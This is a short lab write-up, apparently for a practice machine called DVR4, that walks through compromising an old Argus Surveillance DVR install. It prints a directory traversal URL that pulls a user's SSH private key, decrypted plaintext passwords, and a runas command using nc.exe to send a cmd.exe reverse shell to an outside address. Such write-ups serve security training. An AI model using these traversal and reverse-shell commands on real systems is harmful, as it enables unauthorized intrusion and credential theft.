DVR4
Privilege Escalation using RunAs
Summary
This machine ran an older version of Argus Surveillance DVR, which was vulnerable to a Directory Traversal exploit.
The machine also had an SSH port open, so the initial foothold plan was to get a private SSH key by exploiting the directory traversal vulnerability and attempting to ssh into the machine.
Two usernames were identified from the Argus user dashboard, one of which had an associated SSH private key obtained via the directory traversal exploit.
Within the system, an encrypted password was discovered in the
DVRParams.inifile. Weak encryption methods allowed the decryption of the password, granting plain-text access to the admin user account.Despite SSH access being disabled for the admin user, elevated privileges were achieved using the
runascommand.
🧵Let's Unpack
Enumeration
# Port Scanning
sudo nmap -sC -sN -A -oN nmapFull -p- -A 192.168.172.179
# Got 2 usernames from manual enumeration
- Administrator
- ViewerInitial Foodhold
The plan is to get the id_rsa key into the box using a directory traversal exploit and ssh.
The Location of id_rsa in Windows:
C:/Users/<username>/.ssh/id_rsa
# in our case, it must be
C:/Users/viewer/.ssh/id_rsa
# Getting the key
http://192.168.172.179:8080/WEBACCOUNT.CGI?RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa
# SSH into the box
chmod 400 id_rsa
ssh -i id_rsa viewer@192.168.172.179Priv Escalation
Found the encrypted Password in the following directory.
C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.iniUsed the following script to decrypt the password
# Decrupted passwords
Username: Administrator
password0: 14WatchD0g$
password1: ImWatchingY0uSince SSH was disabled on Administrator, I used runas to get root shell
runas /user:administrator "C:\users\viewer\nc.exe -e cmd.exe 192.168.45.152 443"
# catching the shell using nc
nc -nlvp 443
# Boom Got NT AUTHORITY\SYSTEM shellLast updated